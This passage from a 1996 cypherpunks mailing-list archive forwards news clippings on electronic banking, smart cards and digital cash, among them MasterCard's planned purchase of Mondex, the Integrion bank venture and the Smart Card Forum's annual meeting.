In the future, analysts said, Intuit's best on-line opportunities will
be in providing a consumer ``interface'' to the Internet, rather than
getting bogged down in the pipes and plumbing of transaction processing.

And while Intuit remains the leader in its core business - personal
financial-management software - the company is facing increased
competition from Microsoft Corp., maker of a program called Microsoft
Money.

Microsoft had agreed to acquire Intuit in October 1994 in a deal worth
roughly $2 billion, but abandoned that plan last year under antitrust
scrutiny from the justice department.

``It's a strategy shift,'' Lise Buyer, an analyst at T. Rowe Price in
Baltimore, said of Intuit's announcement. ``But it's impressive that
Intuit is willing to reverse course so quickly.''

Scott Cook, founder and chairman of Intuit, which is based Menlo Park,
Calif., said that transaction-processing had become a distraction.

``It was a sizable investment of dollars but also of management time and
resources, in a business that is not central to our core competencies,''
Cook said.

As a result of the deal, which includes the transfer of 12.6 million
shares of Checkfree stock, Intuit will acquire a 23 percent stake in
Checkfree. Intuit executives said they planned eventually to reduce the
company's share to 19.9 percent, in order to operate as a minority
shareholder and not have to carry Checkfree's results on Intuit's books.

Intuit also announced widening losses for its fiscal fourth quarter
ended July 31, which it attributed to recent acquisitions of companies
that included Interactive Insurance Services Corp. Including charges,
the fourth-quarter net loss grew to $22 million, or 48 cents a share,
from $1.4 million, or 3 cents a share, a year earlier. That was in line
with analysts' expectations.


Checkfree's chief executive and chairman, Peter Kight, said that his
company would lose money in 1997 as a result of the Intuit Services
acquisition. But he called it a necessary step, as banks step up their
on-line efforts.

While the Checkfree acquisition may be subject to government scrutiny,
neither analysts nor the companies expect any antitrust delays -
primarily because there are other large competitors in the electronic
check-clearing business.

Last week, for example, IBM added itself to that list, with the
announcement of Integrion, a venture with 22 banks to provide electronic
bill-processing and other transactions.

The Checkfree deal will enable Intuit to concentrate on its growing
array of Internet-based on-line services. Bill Harris, Intuit's
executive vice president, said Intuit would begin to offer ``front-end''
banking services over the Internet by late next year.



American Banker: Tuesday, September 17, 1996

Rumors of MasterCard's Plans To Buy Mondex Nearing Reality

By VALERIE BLOCK

MasterCard International is nearing an agreement to acquire Mondex, the
stored value smart card technology developed by National Westminster
Bank of London.

The deal, which has been the subject of months of negotiations and
rumors, was hinted at in a speech that MasterCard president H. Eugene
Lockhart made in China 10 days ago.

Officially, MasterCard and Mondex refused to comment, but sources inside
both companies confirmed that a deal is imminent.

Mr. Lockhart said in his speech that MasterCard would announce a major
acquisition in the chip card sector in the next month. According to
Reuters, he said the acquisition "would be global in scope and involve
an alliance of 20 major banks."

He also said MasterCard would own the "intellectual property rights
stemming from the deal."

National Westminster spun off its smart card unit in July, creating
Mondex International Ltd., a joint venture with 17 bank partners
worldwide. With three Japanese banks close to announcing Mondex
franchises, the 20 banks referred to by Mr. Lockhart would be accounted
for.

Mr. Lockhart also told Reuters that People's Bank of China is
considering a smart card launch. He may have mentioned the pending
agreement to entice the bank.

Mr. Lockhart was in China to promote Maestro, MasterCard's on-line debit
brand, which will now be available through the Agricultural Bank of
China.

Industry observers thought Mondex's incorporation in July laid to rest
rumors of a MasterCard takeover, which were circulating all summer. But
it may have served to make the smart card company more attractive.

"Before the announcement, Mondex looked a little tenuous," said a
knowledgeable source. "After the (incorporation), it looked like
something of value."

The source also said that MasterCard's smart card strategy, which began
with considerable fanfare more than two years ago, has fallen short of
expectations, prompting Mr. Lockhart to seek a remedy.

MasterCard's major smart card venture has been a pilot in Canberra,
Australia, which started nine months ago. Visa, by contrast, is running
several tests of its stored-value system globally. Several executives
responsible for MasterCard's early efforts, including Philip Verdi and
Robin Townend, have left the company in recent months.

The deal would be a boon to both companies, sources said. While Mondex
has increased its clout with incorporation, it's still facing "an uphill
battle" to achieve worldwide acceptance, said the source. "Distribution
is what you could assume Mondex is after," he added.

National Westminster retained ownership of Mondex patents and trademark.

It stands to recoup its substantial investment in the technology -- on
top of a potential $150 million from Mondex franchise owners -- if the
MasterCard deal is consummated. The bank remains a minority shareholder
in Mondex International.

Though the industry pooh-poohed National Westminster's initial efforts
to put the fledgling payments system on the map, persistent marketing --
coupled with a strong technological base -- seems to be paying off.
Electronic wallets, smart phones, and card-to-card monetary transfers
set Mondex apart from some less ambitious smart card programs.

With powerful investors like Wells Fargo & Co. in the United States,
Royal Bank of Canada, as well as Hongkong and Shanghai Banking Corp.,
the new brand has gained credibility as a major contender in the chip
card market.

"Mondex blazed a trail," said Peter Hall, PSI International's managing
director of consulting in London. MasterCard would be "buying into a
pool of knowledge, buying into the partners," he added.

Card industry sources said MasterCard and Mondex have many details to
address before they can conclude a deal, including corporate structure
and governance.

One of the biggest issues will be whether to retain the Mondex trademark
or "go with the strength of the MasterCard brand," said a source close
to the deal. That decision will be made "down the road," he added.

The deal is expected to close within three months. No papers have been
signed to date.


American Banker: Tuesday, September 17, 1996

Chase to Offer Dealerships Auto Loan Decisions Over Internet

By DREW CLARK

Chase Manhattan Corp.'s auto financing division has begun using the
Internet to provide dealerships with loan-approval decisions.

The bank is the first of eight financial institutions that have
committed to using the system, developed by International Business
Machines Corp.

By computerizing loan applications and sending data electronically,
Chase officials said the bank can grant approvals in as few as two
minutes.

"It reduces my costs and adds to dealer satisfaction by getting a quick
turnaround," said James B. Brew, president of Chase Automotive Finance
Corp.

Up to 50% of the division's auto loans will be running through the
system within the next 18 months, he said.

Chase, the largest car lender not affiliated with a car company, is
connected to six dealerships currently using the system and will
establish connections to 100 dealers with the official introduction in
October.

Other financial institutions planning to use the on-line system include
NationsBank Corp., Charlotte, N.C.; GE Capital Auto Financial Services
Inc., Barrington, Ill.; Regions Financial Corp., Birmingham, Ala.; and
Citibank Puerto Rico. The auto finance program, residing on the dealer's
personal computer, features a user-friendly screen display with
step-by-step instructions and error checks. Auto dealers can manually
override the screens. The dealer's computer is connected to the Internet
through the IBM Global Network, which is also used to retrieve an
encrypted report from a credit bureau.

The dealer's pre-established "key" decodes the report and causes the
screen to display one, two, or three stars - representing poor, fair, or
good credit. This gives the dealer an idea of which financial
institutions are most likely to approve the loan.

"If the consumer is looking over the dealer's shoulder, they don't see
the word 'loser' flash on the screen," said Neil Lustig, manager of the
project for IBM, explaining the rating system.

Although Chase currently is the only bank with a direct Internet
connection to the system, the dealer can still send loan applications to
other institutions by adding their fax numbers to the screen display.

"We piloted this in our Saturn dealership, and it lent to the customer-
friendly atmosphere perfectly," said John Burns, a dealer in Hempstead,
N.Y.

The system costs about $700 a month, but it can also replace existing
printers and fax machines.

"The old system involved faxing applications which came back with the
credit worthiness in a few hours," Mr. Burns said.

Now, "the information is going in immediately and is analyzed
immediately. If there is a glitch, you can discuss it."

IBM said it plans to extend connections for peripheral services like
auto insurance and extended warranties. In about a year, the company
plans to publish a World Wide Web site offering auto insurance directly
to individual customers, said Mr. Lustig.

"When enough people use the Internet, the economic model will change,"
he said. "If we did that today, we would just disintermediate the
dealerships."



News Release (Wired): Tuesday, September 17, 1996

Citibank's Retired CEO Walter Wriston on the Future of Money

SAN FRANCISCO Though he's in his 70s, Walter Wriston may be the world's
most wired banker.

As chairman and CEO of Citibank in the '60s, '70s and '80s -- a time
when money began turning itself into digital bits and bytes and flowing
around the world via satellite transponders and fiber-optic cables --
Wriston was a major force in the creation of the modern, global,
technological financial system.

Wriston retired in 1984, but his vision of banking is still
cutting-edge.

In an interview with Thomas Bass in the October issue of Wired, Wriston
talks about digital money, the new economy, and prospects for the
nation-state in an increasingly borderless, networked world.

During Wriston's reign, Citibank became the banking industry's
technology leader, guiding its customers away from the local teller
window toward a new way of banking -- automated, online, checkless, and
international, based on distributed networks of computers and ATMs. When
Wriston retired, Citibank was the largest bank in the country, and its
investment in computer hardware and software approached US$1.75 billion.

In a revealing exchange, Wriston doubts whether banks will be running
the financial supermarkets of the future as they continue to lose ground
against non-bank financial powerhouses, such as Merrill Lynch and
General Electric.

Wriston says the future of cash lies in smartcards. Already in wide use
in France, Japan, and Germany, smartcards can be secure and
rechargeable, protected by digital photographs or DNA signatures.

According to Wriston, the creation of an international standard for
encryption is inevitable "because it's necessary for the safety of the
world."

What about the export controls on strong encryption imposed by the U.S.
government? Wriston says to lift them: "You can buy better stuff in
Europe than you can here. We don't have a monopoly on brains."

As for censorship on the Net? "There is no way on God's green Earth the
government can exercise censorship of the Net in any meaningful way."

On the nature of markets, Wriston believes the spread of economic
freedom leads to the spread of political freedom. "Markets are self-
correcting. That's why I trust markets more than governments.
Governments usually aren't self-correcting, until it's too late." Find
out why the value of money is hooked to nothing other than the
information that flows through it -- in the October issue of Wired.

Thomas Bass is the author of "The Eduaemonic Pie." His latest book,
"Vietnamerica: The War Comes Home," is published by Soho Press. Wired
4.10 is available on newsstands for US$4.95, by calling 800/SO WIRED, or
by sending email to subscriptions@wired.com.


Fortune: September 30, 1996

What's New About Digital Cash?

By Justin Fox

E-money is coming, and it's about time. The advance of "smart cards,"
digital checks, and Internet cash will change how people shop and do
business. Banking should become more efficient and less aggravating. It
may even become possible to make money on the Net. But don't let all the
conferences, cover stories, and alarmist pronouncements on the subject
get you too excited--or scared. E- or no e-, it's still just money.

For currency traders and others dealing in huge sums, who have long been
able to zap billions of dollars across the globe in seconds, money as
electrons isn't anything new. Nearly 90% of the money that changes hands
in the U.S. every day does so electronically.

It's that other 10%, which slouches along in the form of cash and
checks, that e-money promises to change. And why not? Would anyone wax
nostalgic about today's unbearable slowness of check clearing, in which
banks that do their bookkeeping on computers hire fleets of airplanes to
fly bundles of paper checks around the country every night?

It will be years before the planes are grounded, but there are already
signs of hope. Lots of regular transfers, like paychecks, are already
handled electronically; banks are offering checklike debit cards; and
Visa is testing utility bills that are sent out and paid online. Visa,
Mastercard, and a British multibank venture called Mondex are rolling
out chip-based smart cards that can store digital cash. The card
companies, banks, and assorted startups are on the verge of making it
easy and (relatively) safe to pay for things over the Internet. These
e-money peddlers smell huge opportunities in the $ 4 trillion of U.S.
consumer purchases that are still paid for each year with cash and
checks. "If we can just electronify a small percentage of that, you can
see what that will do to our business," says Carl Pascarella, CEO of
Visa USA.

A few problems need solving before e-money achieves ubiquity--like fraud
and consumer resistance. But credit cards overcame similar problems in
the 1960s, and like credit cards, e-money is too compelling not to take
off. E-money costs much less to handle than paper cash or checks, and it
offers consumers the ease and safety of credit cards without many of
their limitations. (Credit card transaction costs make small payments
uneconomical; they can only be used to buy things from merchants who are
part of the card network; and they do not offer the protection of
anonymity.) When e-money does hit it big, it will profoundly change--and
greatly expand--electronic commerce. Software could be paid for on a
per-use basis--a tenth of a cent a time, say. Journalism could be bought
by the article. Anybody could set up an online business and instantly
rake in revenue.

What e-money probably won't do, however, is fundamentally transform the
nature of money, although a lot of technoprophets think it will.
Auguries tend to vary on a theme: Money and central banks as we know
them will disappear, national currencies will become extinct, etc. A
particularly alarming Web tract on the topic predicts we'll all be
tattooed with something akin to a universal pricing code to make sure
we're not using someone else's smart card. Hidden in the code will be
the numbers "666." And we all know what that means.

Mainstream economic theory has no answer for the 666 contention, but the
other concerns (or hopes, depending on who's talking) are pretty easily
dismissed as overheated hoo-hah. The one truly revolutionary change in
money over the past couple of centuries has been the switch from coins
made of precious metals to notes made of paper. It was in 1971, when the
world's major currencies threw off their last remaining shackles to
gold, that money became imaginary stuff, its value derived purely from
trust.

Compared with that, switching from paper imaginary money to digital
imaginary money simply isn't that big a deal. It won't expand the money
supply. It won't of itself make national currencies irrelevant. Digital
money can indeed move faster, over mountains and across borders, than
paper checks or cash--hence reducing governments' ability to control its
flow. But the big money started moving this way in the 1970s, at the
time setting off all sorts of alarms about the loss of central bank
power. "The striking parallels give the distinct impression that 'we've
been here before,' " Fed governor Edward Kelley said at a recent
conference. "Then as now, the potential impact on monetary policy of new
electronic payment products has been greatly exaggerated." Fed governors
can be wrong, of course. But since much economic activity will remain
forever off line, it's hard to see how e-money could entirely supplant
national currencies in the real world. Unless technology makes it
possible to digitally pay for and deliver, say, a pizza. When that
happens, there will be no denying it: E-money (and e-anchovies) will
have transformed the world. --Justin Fox


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 03:48:35 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <2P7JuD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Washington Post: Monday, September 16, 1996

Players With Paperless Money

By Michelle Singletary

Banking via personal computer is expected to increase 600 percent in the
next two years, according to a 1996 technology report by the American
Bankers Association and the Ernst & Young accounting firm. Telephone
banking is predicted to grow 50 percent over the next two years and some
experts estimate that 30 percent of U.S. households will be banking
electronically by 2000.

Little known to most consumers, the Washington area is home to a small
but burgeoning subset of the electronic banking industry. The companies
in this emerging market, many of them clustered in Northern Virginia,
are helping to build the technological infrastructure that is rapidly
changing how, when and where consumers bank.

Companies such as US Order, Online Resources & Communications Corp.,
Transaction Network Services (TNS), Visa Interactive and CyberCash Inc.,
all based in Northern Virginia, are members of a group of start-up
technology companies that are helping facilitate the delivery of
electronic and phone banking services.

"The D.C. area has a nice cross section of aggressive and innovative
home banking players," said Phoebe Simpson, an analyst with New
York-based Jupiter Communications Co., a market research firm for the
on-line industry.

Banking and technology experts agree that these Northern Virginia
companies have become integral partners with banks in building the
infrastructure that will support electronic commerce.

They are selling the software, hardware, processing services,
communication linkups and back-office support systems that enable
financial institutions to interact with their customers outside of bank
branches.

While bank offices are not in danger of disappearing, bankers are
increasingly looking for lower-cost delivery channels. Most are turning
to outside electronic commerce companies to help them set up their own
on-line or phone banking systems.

"What we have now is banking without boundaries. Banks now need to
cooperate and collaborate with a whole new source of channel operators,"
said Richard Crone, vice president and general manager of CyberCash.
"Our charter is to empower customers to do their banking anywhere, any
time or with anything."

One reason many of these companies have set up shop here, said company
executives and banking consultants, is to be near such technology firms
as Washington-based MCI Communications Corp., Dulles-based America
Online Inc. and PSINet Inc., an Internet access company based in
Herndon.

"We are the de facto Silicon Valley for on-line information companies,"
said John J. McDonnell Jr., president and CEO of TNS of Reston. The
company has developed a low-cost system for facilitating high-speed,
point-of-sale transactions, such as those made with credit or debit
cards.

Many company executives said they decided to launch their firms in
Northern Virginia because of its proximity to banking regulators and
lawmakers, who are trying to determine how electronic banking technology
will affect consumers and what laws might be needed to protect
customers.

"This industry is important and will have a lot of regulatory need,"
said David Weisman, director of money and technology strategies for
Forrester Research Inc., a consulting firm in Cambridge, Mass.

But chief among the reasons for the growing number of electronic banking
companies is the Washington area's highly skilled labor force, Weisman
said.

The labor pool in the area is overflowing with engineers and others with
telecommunications and software experience, said Matthew P. Lawlor,
chairman and CEO of Online Resources in McLean.

For the most part, the on-line technology companies in this region don't
compete with one another, experts said. Instead, each has positioned
itself to fill certain niches in the electronic banking industry. In
fact, many of the companies are linked financially or have developed
partnerships.

For example, TNS got its start-up capital of $ 1.5 million from William
N. Melton, CyberCash's co-founder. US Order sold its core on-line
banking operations to Visa Interactive, and 50 of its employees went to
work for the newly formed company. Now the two companies market each
other's services.

"This is a monstrous market and no single organization is going to
dominate," said William Gorog, chief operating officer of US Order.

Gorog said CyberCash's concentration on developing secure payment
systems for electronic commerce on the Internet is good for US Order's
business. CyberCash, based in Herndon, currently uses encryption
technology for secure transmission of credit-card data.

Online Resources has decided to go after small and medium-size banks to
sell its home banking services. Online's services include home banking
via computer, bill-paying software, screen-based telephones and
interactive voice response systems for touch-tone telephones.

"A company like Online Resources allows a small bank like us to get into
this technology at a much more reasonable rate," said Frank Bentz, vice
president of communications for Sandy Spring National Bank, an Ol
ney-based banking institution with assets of $ 920 million.

Visa Interactive of Herndon, which offers some of the same services as
Online Resources, has signed up some of the nation's largest financial
institutions including Banc One Corp. of Ohio, Barnett Banks Inc. of
Jacksonville, Fla., and the Pentagon Federal Credit Union, the
second-largest credit union in the Washington area.

"These companies are the pioneers in this industry," said James Wells,
managing director for electronic commerce at Washington-based Furash &
Co., a financial services consulting firm. "By and large, the technology
and innovation that is facilitating electronic commerce is not coming
out of the banks."

Although experts said the electronic commerce companies in Northern
Virginia are still relatively small, they are creating a significant
base of high-paying technical jobs. Software developers at TNS earn $
50,000 to $ 85,000 annually, according to McDonnell.

"This is not minimum-wage work," McDonnell said. "We have not spawned a
lot of jobs but you have to look at the trickle-down effect. We pay big
salaries so our employees can buy big cars."

In just two years, CyberCash has quadrupled its employment to 160, half
of whom work in the area. TNS has 110 employees, up from 45 just two
years ago. Online Resources, which had 50 employees at the end of last
year, now has 80. In the next several months, the company expects have
100 employees.

"I think that the idea of creating brand-new companies and employing a
hundred-plus people, especially at high-end salaries like what engineers
make, will have a definite impact on the area," said Magdelena Yesil,
one of the founders of CyberCash who recently left the company to start
another technology firm.

"People are beginning to see Virginia as an area similar to Silicon
Valley, an area for launching technology companies. There is a sense of
excitement." Transaction Network Services

Like many entrepreneurs, John J. McDonnell Jr. was working for another
company when he came up with the idea for TNS.

McDonnell had been president and CEO of Digital Radio Network Inc., a
Tysons Corner firm that used radio waves to carry point-of-sale
transactions. McDonnell discovered that a fast-dial service could be
created to carry the signal using the 950 dial-up access offered by
local telephone carriers.

McDonnell said he took this idea to Digital Radio's directors, but they
weren't interested. So, he asked if he could trade in his stake in
Digital Radio -- 4 percent of its stock -- in exchange for the right to
start up a company using the idea for the transaction-oriented system.
He left Digital Radio in 1989.

In less than five years, TNS has become one of the biggest players in
this electronic banking niche. TNS processes about 2.2 billion
point-of-sale transactions a year and has captured about 30 percent of
the market.

The company was profitable after its first year, McDonnell said. For its
most recent quarter, ended June 30, TNS reported net income of $ 1.5
million (12 cents a share), a 36 percent increase from income of $ 1.1
million (10 cents) for the same period a year earlier. The company had a
year-over-year increase of 66 percent in transaction volume from its
point-of-sale division.

On June 3, 1991, the first day of of its operation, TNS carried 43
transactions from two Sizzler steakhouses in Arlington, McDonnell said.
At 3 cents a transaction, the company generated $ 1.29 in revenue that
day. On June 3, 1996, the company handled 5.6 million transactions at an
average cost of 2 cents -- taking in $ 118,000 for the day.

"I am a happy man," McDonnell said.

Online Resources & Communications Corp. Matthew P. Lawlor views Online
Resources as a one-stop shop for banks that want to provide electronic
banking options for their customers.

"My vision is that there will not be a single device that will be the
winner in on-line banking," Lawlor said.

Instead of guessing which new electronic banking technology consumers
will embrace, the chairman and chief executive of Online Resources has
decided to offer a full range of services to banks.

Lawlor sees a future in which consumers will want to link up to their
bank via touch-tone phone, personal computer, a specially designed
screen-based telephone, television set or other devices that have not
yet been designed.

"In essence, the technology is moving so fast, half of what we do is
keeping up with it," Lawlor said.

Lawlor said he has positioned Online Resources to provide small and
medium-size financial institutions with any of the applications and
support systems they need to market interactive bank services.

In a year, privately held Online Resources has gone from a client list
of seven financial institutions to 42 today, including Washington-based
Riggs Bank, First Virginia Banks of Falls Church and Baltimore-based
Harbor Bank.

"In the very beginning, we focused on the big guys but many of these big
banks have their own technology people," he said. "Many of the small and
mid-size banks need our skills."

CyberCash Inc.

CyberCash executives are quite clear on their company's role in
electronic banking: It is a contractor building the "infostructure" that
will allow banks to link up to their customers in cyberspace.

"If you asked a banker 10 years ago what business he was in, he would
say loans, deposits and transactions," said Richard Crone of CyberCash.

"That's like saying Amtrak is in the railroad business, when they are in
the transportation business. Banks today are in the information
business," he said. "The value they have, for example, is informing
someone that their loan has been prequalified."

Crone thinks the personal computer is the bank branch of the future,
through which hundreds of thousands of customers will want to conduct
their banking and bill-paying business.

"Consumers are going to be looking for the electronic connections that
will let them reach out to the banks any time and anywhere," he said.

To help move that process along, CyberCash has developed and will soon
begin to test software that would allow credit card firms, utility
companies and other businesses to securely receive their bills over the
Internet.

CyberCash is banking that consumers will want to review their bills this
way and that with a double-click of a mouse will access an account and
pay their creditors electronically.

"We want to provide the ability to fund value in an electronic wallet,"
Crone said.

Visa Interactive

In 1994, Visa Interactive, a subsidiary of Visa International, entered
the on-line industry by purchasing the electronic banking and
bill-paying operations of US Order.

Now, experts are predicting that Herndon-based Visa Interactive, with
its credit-card ties to thousands of financial institutions, could
catapult ahead of competitors such as Online Resources. The company has
signed up more than 90 financial institutions for its remote banking
services.

Visa's goal, like those of other remote banking firms, is to build a
network of services that preserve financial institutions' identities and
customer relationships, much like its parent does with its credit-card
services.

"I think you will see, two years down the road, that Visa Interactive
will have a rich offering of services and they will be among the major
players in terms of revenue," said Simpson of Jupiter Communications.

US Order

Although Herndon-based US Order sold a core part of its home banking
services to Visa International two years ago, it is still a key player
in the electronic commerce industry.

"We are right in the middle of the electronic banking business," said
John C. Backus, US Order's president and chief operating officer.

Among its services are bank-branded customer service, centers that
handle calls for phone banking, touch-tone telephone voice recognition
hardware and software systems for home banking. It also sells PC-based
remote banking technology and screen-based telephones, which at a retail
cost of $ 299 can dial into a consumer's bank, provide stock quotes,
sports scores, news and weather information or a nationwide directory
assistance service.

"We enable the banks to open up the whole range of electronic commerce,"
said Gorog, US Order's CEO.

Gorog said he's excited that his company and other Northern Virginia
firms are part of an industry redefining consumer banking.

"The opportunity to change the banking business is exhilarating," Gorog
said.

"It's so exciting that we are changing people's banking habits."



Time: September 23, 1996

Cashless, Not Bankless

By Adam Zagorin

After watching everyone from Microsoft to Meca Software gobble up
online-banking customers, banks have become eager to prove that they're
not headed for extinction.

Last week IBM and a group of 15 U.S. and Canadian banking behemoths,
including Bank of America, Banc One and Mellon Bank, unveiled a venture
that aims to provide a full range of financial services to the banks' 60
million customers at the touch of a telephone button or the click of a
mouse.

Called Integrion, the partnership will phase in such activities as bill
paying, electronic lending and stock and bond trading beginning next
year. "If we are dinosaurs," says Robert Gillespie, the chief executive
of Cleveland-based KeyCorp, "then we're putting competitors on notice
that a new breed has evolved with a voracious appetite for expanded
market share."

Perhaps so, but the new predators have some catching up to do. Fewer
than 300 U.S. banks have set up Internet sites. Most analysts give the
holdouts four years to either get wired or get left far behind.
Consumers can already pay bills and check balances through computer
networks like America Online and CompuServe. Microsoft, too, has been
signing up banks to provide electronic financial services. Integrion
plans to battle the software giant by linking consumers to accounts
through the Internet, and with financial software like Intuit's Quicken.
The partners will also set up interactive kiosks that act like bank
branches for home banking away from home. "With this new venture," says
IBM chairman Louis Gerstner, "electronic commerce will take its biggest
step forward to date."

The ambitious project will join a host of so-called E-money experiments
that are popping up around the globe. The goal is to replace cash and
checks with electronic transactions that cost just pennies to process.
Citibank, a leader in this push for a cashless society, is developing
what it calls an Electronic Monetary System that will permit consumers
and companies to make payments electronically anywhere in the world.
Visa, fresh off a test of 300,000 smart cards--plastic embedded with a
cache of electronic cash--at the Atlanta Olympics, will soon launch
similar projects in 14 other countries, including Canada, Australia and
in Hong Kong.

E-money devotees like Valerie Baptiste, a San Francisco secretary, think
cash is passe. Baptiste pays for her morning bagel and decaf with a
smart card designed by Britain's Mondex and being tested in the U.S.
with partners that include Wells Fargo and AT&T. As other customers
fumble with change, Baptiste hands her card to a cashier who takes less
than five seconds to punch it into a machine that deducts $ 2.15 from
the stored-up funds. "This is the beginning of the end of cash,"
Baptiste says. Unless banks charge swiftly into the E-money era, it
could be the end of many of them too.



Associated Press: Tuesday, September 17, 1996

Merchants Like Smart Cards to Keep Tabs on Customers

By PATRICIA LAMIELL

Merchants are attracted to "smart cards" as a way to gather information
about their customers, according to a survey released Monday by a group
promoting the plastic cash cards that are embedded with a computer chip.

Results were released at the opening of the two-day convention of the
group, the Smart Card Forum, which also is trying to to convince the
public that smart cards are protected and confidential.

Customers can use smart cards like debit cards or automatic teller
cards, to pay for anything from gas to groceries. Because the card also
has a computer chip, it can keep track of what consumers buy and when,
and how much they spend.

"A smart card can store data about customers, such as product
preferences, spending history, and important information that can help
provide improved personalized customers service," said Cliff Wilke, vice
president for business development at Mobil Oil Credit Corp.

Polls done by the Harris organization and the forum have shown that
consumers are receptive to using smart cards but concerned about storing
personal data on them. In a 1995 forum study, 70 percent asked what
safeguards exist to prevent unauthorized access to their personal,
financial and medical information.

Merchants surveyed by the Smart Card Forum said the cards made
transactions quicker and cheaper for them. They also said the cards made
it easy to gather information on customers for use in marketing and
promotional programs, and for loyalty programs like frequent flier
miles.

Most merchants surveyed said they believed consumers spend more when
they pay with a credit or debit card than when they pay with cash. The
study found other benefits to merchants such as theft prevention.

The study also indicated that the cards don't have to be used that much
to make them cost-effective for the merchant.

"Grocery stores, convenience stores, movie theaters and gasoline
retailers indicated that a mere 2 to 10 percent - an extremely low
threshold of consumer demand - is required for them to realize the
benefits of smart cards," the group said.

While the survey results released by the forum highlighted selling
points for the cards, recent tests have revealed obstacles to be
overcome to win merchant and consumer acceptance.

Consumers were frustrated when they found some merchants listed in smart
card directories either had not installed equipment for using the cards
or stopped using the equipment because of malfunctions, according to an
independent study of the Visa Cash Card tests at the Olympics in
Atlanta.

But that study, released earlier this month by Brittain Associates Inc.,
also reported that most smart card users said they found the card
attractive and would use it in the future if the number of merchants
accepting it increased dramatically.

The Smart Card Forum interviewed 65 major merchants in 11 categories,
such as grocery, gas, convenience stores, drug stores, restaurants and
theaters.

Established in 1993, the forum has more than 225 corporate and
government members including Chase Manhattan Corp., Citibank, MCI
Communications Inc., MasterCard, Visa, International Business Machines
Corp., Microsoft Corp., Mobil and Delta Air Lines Inc. Federal agency
members include the Postal Service, the Federal Reserve, and the
treasury and defense departments.



---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 03:29:24 +0800
To: cypherpunks@toad.com
Subject: [NEWS] Crypto-relevant wire clippings
Message-ID: <3R7JuD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


News Release (Environics): Monday, September 16, 1996

Smart Card Forum Draws 500 Industry & Government Leaders

SAN FRANCISCO-- The Smart Card Forum today announced that more than 500
industry and government leaders met at its Annual Meeting in San
Francisco to review the progress of smart card technology and to lay the
foundation for the accelerating pace of its adoption during 1997.

Representatives from a "who's who" of government and corporate America
gained first-hand information and senior-level perspectives that will
help them make strategic decisions around the use of smart cards in
emerging markets such as payment, network security, relationship
banking, remote data access, and cellular phone security. The way in
which the combination of PC and smart card technologies will accelerate
the deployment of new applications providing a greater security and
portability on the Internet was an area of particular interest.

"As these exciting new applications are created and gain momentum during
the next five years," says Jean McKenna, Forum President, "the smart
card becomes a logical vehicle for distributed information management,
identification, security and payment." According to McKenna, who also is
V.P. Payment Technologies, Visa International, "The impact will be
revolutionary, widespread and positive -- especially for consumers."

Speakers on the theme: The History of Money - The Future of Payments:
Past, Present and Future Perspectives on How Commerce is Enabled,
included:

-- Martin Mayer, author of The Bankers and numerous financial and
business books and Guest Scholar at The Brookings Institution in
Washington, D.C.;

-- Peter Hill, Executive Vice President, Visa International; and

-- Michel Ugon, Vice President, R&D, Bull CP8, and early developer of
the microprocessor smart card.

1996 will be looked at as the year when stored value applications on
smart cards started serious deployment in North America. The 1996 Annual
Meeting reflected the crest of this wave with presentations today on
four leading stored value card implementations.

The speakers were:

-- Cynthia Bengier, Vice President, Wells Fargo, for Mondex
International;

-- Edgar Brown, Vice President, First Union National Bank, for Visa
Cash; -- Michael Bradley, Project Manager, Bank of Montreal, for Proton;
and

-- Lin D. Ison, Executive Manager, Smart Card Systems, Commonwealth Bank
of Australia, for MasterCard Cash.

The next wave in smart technology

The next wave coming that will capture more and more energy of the Forum
and its members is the Internet. The combination of PCs and smart cards
will promote the development of new applications that tie security and
portability together.

"The emergence of 'virtual' merchants and the expansion of mechanized
payment options promises to offer consumers, merchants, and financial
institutions a broad set of new opportunities," says Roger Bertman, Vice
President and General Manager, Internet Commerce, VeriFone.

"In particular, the Internet will offer a whole new world of selling and
buying, and the mechanization of what has been cash will provide a basis
for expanded purchasing options. The smart card will clearly be the
'glue' that will enable the disparate worlds of physical and 'virtual'
merchants and a broad spectrum of payment methods to be brought together
in order to tap these opportunities."

Interoperability was among the pivotal issues addressed by Gerald Smith,
Manager, Smart Consumer Services, IBM. "As smart card implementations
evolve from single to multiple-applications and from single to
multiple-issuer services, the subject of interoperability is gaining
increased scrutiny," says Smith.

To achieve critical mass, interoperability between cards and reading
devices is required. Panelists addressing the future directions and
strategies of payment included:

-- Janet Hartung, SVP, Wells Fargo;

-- Marlee Laks, Technology Leader, American Express;

-- Tim Steward, EVP, Mondex International;

-- John Tunstall, VP, MasterCard International;

-- Bette Wasserman, VP, Bank of America; and

-- Gaylen Howe, Visa International.

John D. Wright, Senior Counsel, Wells Fargo, and John Burke, Partner,
Foley, Hoag & Eliot LLP, moderated a panel discussion of key legal,
public policy and private issues presented by a multi-application smart
card, including Regulation E, FDIC insurance and relevant state laws.
Consumer and merchant research shows smart card potential

A new Forum study made public at the meeting indicates that merchants
are quickly focusing on the many other benefits smart cards offer,
beyond the stored value application, and they see different benefits to
be derived from the technology. These benefits include customer
information, offering loyalty or "frequent shopper" programs, electronic
ticketing and couponing and stored value for self-service purchases.

A second important finding of the study is that a surprisingly low level
of customer base penetration is required for many merchants to realize
the benefits of smart cards.

Grocery stores, convenience stores, movie theaters and gasoline
retailers indicated that a mere two to 10 percent of consumers -- an
extremely low threshold of marketplace demand -- is required for them to
realize the benefits of smart card implementation.

"A smart card, as opposed to a magnetic stripe card, has the capability
of storing information, monetary value, processing transactions
off-line, and enhancing a consumer's security and privacy," McKenna
says. "Merchants are quickly focusing on the many benefits smart cards
can offer both them and consumers."

Consumers also favor multi-application smart cards -- 61 percent
responded positively in Forum research. They prefer multi-application
smart cards in order to carry and access information needed in an
emergency and to reduce the number of cards carried, paper records kept
and forms to be filled out.

The Smart Card Forum

The Smart Card Forum is a non-profit, multi-industry membership
organization promoting the widespread acceptance of multiple application
